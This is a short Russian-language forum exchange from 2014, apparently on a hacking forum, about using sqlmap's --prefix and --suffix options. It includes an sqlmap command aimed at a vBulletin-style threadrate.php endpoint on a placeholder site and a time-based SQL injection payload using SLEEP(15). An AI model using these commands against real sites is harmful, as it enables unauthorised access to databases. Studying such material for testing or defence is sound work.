25.01.2014, 21:29
|
|
Guest
Сообщений: n/a
Провел на форуме:
0
Репутация:
0
|
|
Сообщение от Zed0x
Zed0x said:
Прежде чем говорить - проверьте.
Код HTML:
HTML:
sqlmap --help
За payload отвечает две опции:
--prefix=PREFIX Injection payload prefix string
--suffix=SUFFIX Injection payload suffix string
соответственно Ваш запрос будет примерно таким:
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]sqlmap[/COLOR][COLOR="#007700"]--[/COLOR][COLOR="#0000BB"]url[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"http://www.site.com/threadrate.php?t=104496"[/COLOR][COLOR="#007700"]--[/COLOR][COLOR="#0000BB"]data[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"securitytoken=guest*&t=104496&pp=10&page=1&vote=5"[/COLOR][COLOR="#007700"]--[/COLOR][COLOR="#0000BB"]prefix[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"));"[/COLOR][COLOR="#007700"]--[/COLOR][COLOR="#0000BB"]dbms[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"MySQL"[/COLOR][/COLOR]
Для начала спасибо вам, попробую.
А так я и вправду видел это, но как это применять в команде не понимал. Тоесть если у меня:
Payload: '"%2bSLEEP(15)--
то команда будет включать
Код:
Code:
--prefix=""%2b"
?
|
|
|
|